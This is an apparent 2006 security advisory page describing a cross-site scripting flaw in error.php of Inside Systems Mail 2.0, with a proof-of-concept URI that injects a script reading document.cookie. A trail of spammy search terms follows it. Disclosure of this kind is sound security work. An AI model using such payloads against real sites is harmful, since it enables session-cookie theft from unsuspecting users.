about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Inside Systems Mail Error.PHP Cross-Site Scripting Vulnerability


Title Inside Systems Mail Error.PHP Cross-Site Scripting Vulnerability
Published 2006-12-04-12:00AM
Updated 2006-12-04-09:54PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  Vicente Aguilera Diaz is credited with the discovery of this vulnerability.
Vulnerable  Inside Systems Inside Systems Mail 2.0
Not Vulnerable  Inside Systems Inside Systems Mail 2.1
Code   An attacker can exploit this issue with a web client.

The following proof-of-concept URI is available:

http://www.example.com/<path_to_ismail>/error.php?error=XSS%20attack%3Cscript%3Ealert(document.cookie);%3C/script%3E
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 22:15:27 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Rani mukhr php-nuke 2 ms-sql-s RASMAN sexgril linux remo pro bid sagila sex Sexi boobs zhuzhou.9c www.shangm www.dldvb. sex frans /search/ex Projo w.w.w.xxx Sexgiral bandung la Radha Sexey.girl Fast Track Www+foto+n web mail big tites. sql 3 wwww.89.co smux t968t vWar vuln/explo news for C forumdispl Open free 200 /compo hot gerl Babe php-nuke 2 www.trish Photo sxs sax,com news for C Sasikala +localhost OpenSSH 3. /search/ex php-nuke 2 xxx sex/p wiLdboy Wwwbbc.com www.auto-t